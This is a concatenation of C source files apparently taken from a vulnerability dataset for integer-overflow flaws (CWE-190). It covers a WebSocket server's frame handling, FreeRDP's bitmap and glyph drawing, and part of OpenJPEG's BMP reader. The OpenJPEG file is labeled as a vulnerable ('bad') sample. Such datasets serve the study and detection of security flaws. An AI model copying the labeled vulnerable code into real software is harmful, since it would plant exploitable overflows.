info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
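/*
 * Editorial note: decode_pkg() below parses a single client-to-server
 * WebSocket frame (RFC 6455). Layout as handled here:
 *   byte 0: FIN flag (0x80) | opcode (low 4 bits)
 *   byte 1: MASK flag (0x80, mandatory for client frames) | 7-bit payload length
 *   if length == 126: 2 extra bytes, big-endian 16-bit payload length
 *   if length == 127: 8 extra bytes, big-endian 64-bit payload length
 *   next 4 bytes: masking key
 *   payload: each byte XORed with masks[i % 4]
 * Returning 0 means "incomplete, wait for more data"; a negative value
 * rejects the connection.
 */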
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_401_3 |
crossvul-cpp_data_good_673_0 | /**
* FreeRDP: A Remote Desktop Protocol Implementation
* Graphical Objects
*
* Copyright 2011 Marc-Andre Moreau <marcandre.moreau@gmail.com>
* Copyright 2016 Armin Novak <armin.novak@thincast.com>
* Copyright 2016 Thincast Technologies GmbH
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include <winpr/crt.h>
#include <freerdp/log.h>
#include <freerdp/gdi/dc.h>
#include <freerdp/gdi/shape.h>
#include <freerdp/gdi/region.h>
#include <freerdp/gdi/bitmap.h>
#include "clipping.h"
#include "drawing.h"
#include "brush.h"
#include "graphics.h"
#define TAG FREERDP_TAG("gdi")
/* Bitmap Class */
HGDI_BITMAP gdi_create_bitmap(rdpGdi* gdi, UINT32 nWidth, UINT32 nHeight,
UINT32 SrcFormat, BYTE* data)
{
UINT32 nSrcStep;
UINT32 nDstStep;
BYTE* pSrcData;
BYTE* pDstData;
HGDI_BITMAP bitmap;
if (!gdi)
return NULL;
nDstStep = nWidth * GetBytesPerPixel(gdi->dstFormat);
pDstData = _aligned_malloc(nHeight * nDstStep, 16);
if (!pDstData)
return NULL;
pSrcData = data;
nSrcStep = nWidth * GetBytesPerPixel(SrcFormat);
if (!freerdp_image_copy(pDstData, gdi->dstFormat, nDstStep, 0, 0,
nWidth, nHeight, pSrcData, SrcFormat, nSrcStep, 0, 0,
&gdi->palette, FREERDP_FLIP_NONE))
{
_aligned_free(pDstData);
return NULL;
}
bitmap = gdi_CreateBitmap(nWidth, nHeight, gdi->dstFormat, pDstData);
return bitmap;
}
static BOOL gdi_Bitmap_New(rdpContext* context, rdpBitmap* bitmap)
{
gdiBitmap* gdi_bitmap;
rdpGdi* gdi = context->gdi;
gdi_bitmap = (gdiBitmap*) bitmap;
gdi_bitmap->hdc = gdi_CreateCompatibleDC(gdi->hdc);
if (!gdi_bitmap->hdc)
return FALSE;
if (!bitmap->data)
gdi_bitmap->bitmap = gdi_CreateCompatibleBitmap(
gdi->hdc, bitmap->width,
bitmap->height);
else
{
UINT32 format = bitmap->format;
gdi_bitmap->bitmap = gdi_create_bitmap(gdi, bitmap->width,
bitmap->height,
format, bitmap->data);
}
if (!gdi_bitmap->bitmap)
{
gdi_DeleteDC(gdi_bitmap->hdc);
return FALSE;
}
gdi_bitmap->hdc->format = gdi_bitmap->bitmap->format;
gdi_SelectObject(gdi_bitmap->hdc, (HGDIOBJECT) gdi_bitmap->bitmap);
gdi_bitmap->org_bitmap = NULL;
return TRUE;
}
static void gdi_Bitmap_Free(rdpContext* context, rdpBitmap* bitmap)
{
gdiBitmap* gdi_bitmap = (gdiBitmap*) bitmap;
if (gdi_bitmap)
{
if (gdi_bitmap->hdc)
gdi_SelectObject(gdi_bitmap->hdc, (HGDIOBJECT) gdi_bitmap->org_bitmap);
gdi_DeleteObject((HGDIOBJECT) gdi_bitmap->bitmap);
gdi_DeleteDC(gdi_bitmap->hdc);
_aligned_free(bitmap->data);
}
free(bitmap);
}
static BOOL gdi_Bitmap_Paint(rdpContext* context, rdpBitmap* bitmap)
{
gdiBitmap* gdi_bitmap = (gdiBitmap*) bitmap;
UINT32 width = bitmap->right - bitmap->left + 1;
UINT32 height = bitmap->bottom - bitmap->top + 1;
return gdi_BitBlt(context->gdi->primary->hdc,
bitmap->left, bitmap->top,
width, height, gdi_bitmap->hdc,
0, 0, GDI_SRCCOPY, &context->gdi->palette);
}
static BOOL gdi_Bitmap_Decompress(rdpContext* context, rdpBitmap* bitmap,
const BYTE* pSrcData, UINT32 DstWidth, UINT32 DstHeight,
UINT32 bpp, UINT32 length, BOOL compressed,
UINT32 codecId)
{
UINT32 SrcSize = length;
rdpGdi* gdi = context->gdi;
UINT32 size = DstWidth * DstHeight;
bitmap->compressed = FALSE;
bitmap->format = gdi->dstFormat;
if ((GetBytesPerPixel(bitmap->format) == 0) ||
(DstWidth == 0) || (DstHeight == 0) || (DstWidth > UINT32_MAX / DstHeight) ||
(size > (UINT32_MAX / GetBytesPerPixel(bitmap->format))))
return FALSE;
size *= GetBytesPerPixel(bitmap->format);
bitmap->length = size;
bitmap->data = (BYTE*) _aligned_malloc(bitmap->length, 16);
if (!bitmap->data)
return FALSE;
if (compressed)
{
if (bpp < 32)
{
if (!interleaved_decompress(context->codecs->interleaved,
pSrcData, SrcSize,
DstWidth, DstHeight,
bpp,
bitmap->data, bitmap->format,
0, 0, 0, DstWidth, DstHeight,
&gdi->palette))
return FALSE;
}
else
{
if (!planar_decompress(context->codecs->planar, pSrcData, SrcSize,
DstWidth, DstHeight,
bitmap->data, bitmap->format, 0, 0, 0,
DstWidth, DstHeight, TRUE))
return FALSE;
}
}
else
{
const UINT32 SrcFormat = gdi_get_pixel_format(bpp);
const size_t sbpp = GetBytesPerPixel(SrcFormat);
const size_t dbpp = GetBytesPerPixel(bitmap->format);
if ((sbpp == 0) || (dbpp == 0))
return FALSE;
else
{
const size_t dstSize = SrcSize * dbpp / sbpp;
if (dstSize < bitmap->length)
return FALSE;
}
if (!freerdp_image_copy(bitmap->data, bitmap->format, 0, 0, 0,
DstWidth, DstHeight, pSrcData, SrcFormat,
0, 0, 0, &gdi->palette, FREERDP_FLIP_VERTICAL))
return FALSE;
}
return TRUE;
}
static BOOL gdi_Bitmap_SetSurface(rdpContext* context, rdpBitmap* bitmap,
BOOL primary)
{
rdpGdi* gdi;
if (!context)
return FALSE;
gdi = context->gdi;
if (!gdi)
return FALSE;
if (primary)
gdi->drawing = gdi->primary;
else
gdi->drawing = (gdiBitmap*) bitmap;
return TRUE;
}
/* Glyph Class */
static BOOL gdi_Glyph_New(rdpContext* context, const rdpGlyph* glyph)
{
BYTE* data;
gdiGlyph* gdi_glyph;
if (!context || !glyph)
return FALSE;
gdi_glyph = (gdiGlyph*) glyph;
gdi_glyph->hdc = gdi_GetDC();
if (!gdi_glyph->hdc)
return FALSE;
gdi_glyph->hdc->format = PIXEL_FORMAT_MONO;
data = freerdp_glyph_convert(glyph->cx, glyph->cy, glyph->aj);
if (!data)
{
gdi_DeleteDC(gdi_glyph->hdc);
return FALSE;
}
gdi_glyph->bitmap = gdi_CreateBitmap(glyph->cx, glyph->cy, PIXEL_FORMAT_MONO,
data);
if (!gdi_glyph->bitmap)
{
gdi_DeleteDC(gdi_glyph->hdc);
_aligned_free(data);
return FALSE;
}
gdi_SelectObject(gdi_glyph->hdc, (HGDIOBJECT) gdi_glyph->bitmap);
gdi_glyph->org_bitmap = NULL;
return TRUE;
}
static void gdi_Glyph_Free(rdpContext* context, rdpGlyph* glyph)
{
gdiGlyph* gdi_glyph;
gdi_glyph = (gdiGlyph*) glyph;
if (gdi_glyph)
{
gdi_SelectObject(gdi_glyph->hdc, (HGDIOBJECT) gdi_glyph->org_bitmap);
gdi_DeleteObject((HGDIOBJECT) gdi_glyph->bitmap);
gdi_DeleteDC(gdi_glyph->hdc);
free(glyph->aj);
free(glyph);
}
}
static BOOL gdi_Glyph_Draw(rdpContext* context, const rdpGlyph* glyph, INT32 x,
INT32 y, INT32 w, INT32 h, INT32 sx, INT32 sy, BOOL fOpRedundant)
{
gdiGlyph* gdi_glyph;
rdpGdi* gdi;
HGDI_BRUSH brush;
BOOL rc = FALSE;
if (!context || !glyph)
return FALSE;
gdi = context->gdi;
gdi_glyph = (gdiGlyph*) glyph;
if (!fOpRedundant && 0)
{
GDI_RECT rect = { 0 };
if (x > 0)
rect.left = x;
if (y > 0)
rect.top = y;
if (x + w > 0)
rect.right = x + w - 1;
if (y + h > 0)
rect.bottom = y + h - 1;
if ((rect.left < rect.right) && (rect.top < rect.bottom))
{
brush = gdi_CreateSolidBrush(gdi->drawing->hdc->bkColor);
if (!brush)
return FALSE;
gdi_FillRect(gdi->drawing->hdc, &rect, brush);
gdi_DeleteObject((HGDIOBJECT)brush);
}
}
brush = gdi_CreateSolidBrush(gdi->drawing->hdc->textColor);
if (!brush)
return FALSE;
gdi_SelectObject(gdi->drawing->hdc, (HGDIOBJECT)brush);
rc = gdi_BitBlt(gdi->drawing->hdc, x, y, w, h, gdi_glyph->hdc, sx, sy,
GDI_GLYPH_ORDER, &context->gdi->palette);
gdi_DeleteObject((HGDIOBJECT)brush);
return rc;
}
static BOOL gdi_Glyph_SetBounds(rdpContext* context, INT32 x, INT32 y, INT32 width, INT32 height)
{
rdpGdi* gdi;
if (!context || !context->gdi)
return FALSE;
gdi = context->gdi;
if (!gdi->drawing || !gdi->drawing->hdc)
return FALSE;
return gdi_SetClipRgn(gdi->drawing->hdc, x, y, width, height);
}
static BOOL gdi_Glyph_BeginDraw(rdpContext* context, INT32 x, INT32 y,
INT32 width, INT32 height, UINT32 bgcolor,
UINT32 fgcolor, BOOL fOpRedundant)
{
rdpGdi* gdi;
if (!context || !context->gdi)
return FALSE;
gdi = context->gdi;
if (!gdi->drawing || !gdi->drawing->hdc)
return FALSE;
if (!fOpRedundant)
{
if (!gdi_decode_color(gdi, bgcolor, &bgcolor, NULL))
return FALSE;
if (!gdi_decode_color(gdi, fgcolor, &fgcolor, NULL))
return FALSE;
gdi_SetClipRgn(gdi->drawing->hdc, x, y, width, height);
gdi_SetTextColor(gdi->drawing->hdc, bgcolor);
gdi_SetBkColor(gdi->drawing->hdc, fgcolor);
if (1)
{
GDI_RECT rect = { 0 };
HGDI_BRUSH brush = gdi_CreateSolidBrush(fgcolor);
if (!brush)
return FALSE;
if (x > 0)
rect.left = x;
if (y > 0)
rect.top = y;
rect.right = x + width - 1;
rect.bottom = y + height - 1;
if ((x + width > rect.left) && (y + height > rect.top))
gdi_FillRect(gdi->drawing->hdc, &rect, brush);
gdi_DeleteObject((HGDIOBJECT)brush);
}
return gdi_SetNullClipRgn(gdi->drawing->hdc);
}
return TRUE;
}
static BOOL gdi_Glyph_EndDraw(rdpContext* context, INT32 x, INT32 y,
INT32 width, INT32 height, UINT32 bgcolor, UINT32 fgcolor)
{
rdpGdi* gdi;
if (!context || !context->gdi)
return FALSE;
gdi = context->gdi;
if (!gdi->drawing || !gdi->drawing->hdc)
return FALSE;
gdi_SetNullClipRgn(gdi->drawing->hdc);
return TRUE;
}
/* Graphics Module */
BOOL gdi_register_graphics(rdpGraphics* graphics)
{
rdpBitmap bitmap;
rdpGlyph glyph;
bitmap.size = sizeof(gdiBitmap);
bitmap.New = gdi_Bitmap_New;
bitmap.Free = gdi_Bitmap_Free;
bitmap.Paint = gdi_Bitmap_Paint;
bitmap.Decompress = gdi_Bitmap_Decompress;
bitmap.SetSurface = gdi_Bitmap_SetSurface;
graphics_register_bitmap(graphics, &bitmap);
glyph.size = sizeof(gdiGlyph);
glyph.New = gdi_Glyph_New;
glyph.Free = gdi_Glyph_Free;
glyph.Draw = gdi_Glyph_Draw;
glyph.BeginDraw = gdi_Glyph_BeginDraw;
glyph.EndDraw = gdi_Glyph_EndDraw;
glyph.SetBounds = gdi_Glyph_SetBounds;
graphics_register_glyph(graphics, &glyph);
return TRUE;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_673_0 |
crossvul-cpp_data_bad_4867_0 | /*
* The copyright in this software is being made available under the 2-clauses
* BSD License, included below. This software may be subject to other third
* party and contributor rights, including patent rights, and no such rights
* are granted under this license.
*
* Copyright (c) 2002-2014, Universite catholique de Louvain (UCL), Belgium
* Copyright (c) 2002-2014, Professor Benoit Macq
* Copyright (c) 2001-2003, David Janssens
* Copyright (c) 2002-2003, Yannick Verschueren
* Copyright (c) 2003-2007, Francois-Olivier Devaux
* Copyright (c) 2003-2014, Antonin Descampe
* Copyright (c) 2005, Herve Drolon, FreeImage Team
* Copyright (c) 2006-2007, Parvatha Elangovan
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include "opj_apps_config.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "openjpeg.h"
#include "convert.h"
typedef struct {
OPJ_UINT16 bfType; /* 'BM' for Bitmap (19776) */
OPJ_UINT32 bfSize; /* Size of the file */
OPJ_UINT16 bfReserved1; /* Reserved : 0 */
OPJ_UINT16 bfReserved2; /* Reserved : 0 */
OPJ_UINT32 bfOffBits; /* Offset */
} OPJ_BITMAPFILEHEADER;
typedef struct {
OPJ_UINT32 biSize; /* Size of the structure in bytes */
OPJ_UINT32 biWidth; /* Width of the image in pixels */
OPJ_UINT32 biHeight; /* Height of the image in pixels */
OPJ_UINT16 biPlanes; /* 1 */
OPJ_UINT16 biBitCount; /* Number of bits per pixel */
OPJ_UINT32 biCompression; /* Type of encoding 0: none 1: RLE8 2: RLE4 */
OPJ_UINT32 biSizeImage; /* Size of the image in bytes */
OPJ_UINT32 biXpelsPerMeter; /* Horizontal (X) resolution in pixels/meter */
OPJ_UINT32 biYpelsPerMeter; /* Vertical (Y) resolution in pixels/meter */
OPJ_UINT32 biClrUsed; /* Number of colors used in the image (0: ALL) */
OPJ_UINT32 biClrImportant; /* Number of important colors (0: ALL) */
OPJ_UINT32 biRedMask; /* Red channel bit mask */
OPJ_UINT32 biGreenMask; /* Green channel bit mask */
OPJ_UINT32 biBlueMask; /* Blue channel bit mask */
OPJ_UINT32 biAlphaMask; /* Alpha channel bit mask */
OPJ_UINT32 biColorSpaceType; /* Color space type */
OPJ_UINT8 biColorSpaceEP[36]; /* Color space end points */
OPJ_UINT32 biRedGamma; /* Red channel gamma */
OPJ_UINT32 biGreenGamma; /* Green channel gamma */
OPJ_UINT32 biBlueGamma; /* Blue channel gamma */
OPJ_UINT32 biIntent; /* Intent */
OPJ_UINT32 biIccProfileData; /* ICC profile data */
OPJ_UINT32 biIccProfileSize; /* ICC profile size */
OPJ_UINT32 biReserved; /* Reserved */
} OPJ_BITMAPINFOHEADER;
static void opj_applyLUT8u_8u32s_C1R(
OPJ_UINT8 const* pSrc, OPJ_INT32 srcStride,
OPJ_INT32* pDst, OPJ_INT32 dstStride,
OPJ_UINT8 const* pLUT,
OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 y;
for (y = height; y != 0U; --y) {
OPJ_UINT32 x;
for(x = 0; x < width; x++)
{
pDst[x] = (OPJ_INT32)pLUT[pSrc[x]];
}
pSrc += srcStride;
pDst += dstStride;
}
}
static void opj_applyLUT8u_8u32s_C1P3R(
OPJ_UINT8 const* pSrc, OPJ_INT32 srcStride,
OPJ_INT32* const* pDst, OPJ_INT32 const* pDstStride,
OPJ_UINT8 const* const* pLUT,
OPJ_UINT32 width, OPJ_UINT32 height)
{
OPJ_UINT32 y;
OPJ_INT32* pR = pDst[0];
OPJ_INT32* pG = pDst[1];
OPJ_INT32* pB = pDst[2];
OPJ_UINT8 const* pLUT_R = pLUT[0];
OPJ_UINT8 const* pLUT_G = pLUT[1];
OPJ_UINT8 const* pLUT_B = pLUT[2];
for (y = height; y != 0U; --y) {
OPJ_UINT32 x;
for(x = 0; x < width; x++)
{
OPJ_UINT8 idx = pSrc[x];
pR[x] = (OPJ_INT32)pLUT_R[idx];
pG[x] = (OPJ_INT32)pLUT_G[idx];
pB[x] = (OPJ_INT32)pLUT_B[idx];
}
pSrc += srcStride;
pR += pDstStride[0];
pG += pDstStride[1];
pB += pDstStride[2];
}
}
static void bmp24toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image)
{
int index;
OPJ_UINT32 width, height;
OPJ_UINT32 x, y;
const OPJ_UINT8 *pSrc = NULL;
width = image->comps[0].w;
height = image->comps[0].h;
index = 0;
pSrc = pData + (height - 1U) * stride;
for(y = 0; y < height; y++)
{
for(x = 0; x < width; x++)
{
image->comps[0].data[index] = (OPJ_INT32)pSrc[3*x+2]; /* R */
image->comps[1].data[index] = (OPJ_INT32)pSrc[3*x+1]; /* G */
image->comps[2].data[index] = (OPJ_INT32)pSrc[3*x+0]; /* B */
index++;
}
pSrc -= stride;
}
}
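/* Derive the bit shift (number of trailing zero bits) and precision (number of consecutive set bits) of a BMP channel mask. */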
static void bmp_mask_get_shift_and_prec(OPJ_UINT32 mask, OPJ_UINT32* shift, OPJ_UINT32* prec)
{
OPJ_UINT32 l_shift, l_prec;
l_shift = l_prec = 0U;
if (mask != 0U) {
while ((mask & 1U) == 0U) {
mask >>= 1;
l_shift++;
}
while (mask & 1U) {
mask >>= 1;
l_prec++;
}
}
*shift = l_shift; *prec = l_prec;
}
static void bmpmask32toimage(const OPJ_UINT8* pData, OPJ_UINT32 stride, opj_image_t* image, OPJ_UINT32 redMask, OPJ_UINT32 greenMask, OPJ_UINT32 blueMask, OPJ_UINT32 alphaMask)
{
int index;
OPJ_UINT32 width, height;
OPJ_UINT32 x, y;
const OPJ_UINT8 *pSrc = NULL;
OPJ_BOOL hasAlpha;
OPJ_UINT32 redShift, redPrec;
OPJ_UINT32 greenShift, greenPrec;
OPJ_UINT32 blueShift, bluePrec;
OPJ_UINT32 alphaShift, alphaPrec;
width = image->comps[0].w;
height = image->comps[0].h;
hasAlpha = image->numcomps > 3U;
bmp_mask_get_shift_and_prec(redMask, &redShift, &redPrec);
bmp_mask_get_shift_and_prec(greenMask, &greenShift, &greenPrec);
bmp_mask_get_shift_and_prec(blueMask, &blueShift, &bluePrec);
bmp_mask_get_shift_and_prec(alphaMask, &alphaShift, &alphaPrec);
image->comps[0].bpp = redPrec;
image->comps[0].prec = redPrec;
image->comps[1].bpp = greenPrec;
image->comps[1].prec = greenPrec;
image->comps[2].bpp = bluePrec;
image->comps[2].prec = bluePrec;
if (hasAlpha) {
image->comps[3].bpp = alphaPrec;
image->comps[3].prec = alphaPrec;
}
index = 0;
pSrc = pData + (height - 1U) * stride;
for(y = 0; y < height; y++)
{
for(x = 0; x < width; x++)
{
OPJ_UINT32 value = 0U;
value |= ((OPJ_UINT32)pSrc[4*x+0]) << 0;
value |= ((OPJ_UINT32)pSrc[4*x+1]) << 8;
value |= ((OPJ_UINT32)pSrc[4*x+2]) << 16;
value |= ((OPJ_UINT32)pSrc[4*x+3]) << 24;
image->comps[0].data[index] = (OPJ_INT32)((value & redMask) >> redShift); /* R */
image->comps[1].data[index] = (OPJ_INT32)((value & greenMask) >> greenShift); /* G */
image->comps[2].data[index] = (OPJ_INT32)((value & blueMask) >> blueShift); /* B */
if (hasAlpha) {
image->comps[3].data[index] = (OPJ_INT32)((value & alphaMask) >> alphaShift); /* A */
}
index++;
}
pSrc -= stride;
}
}
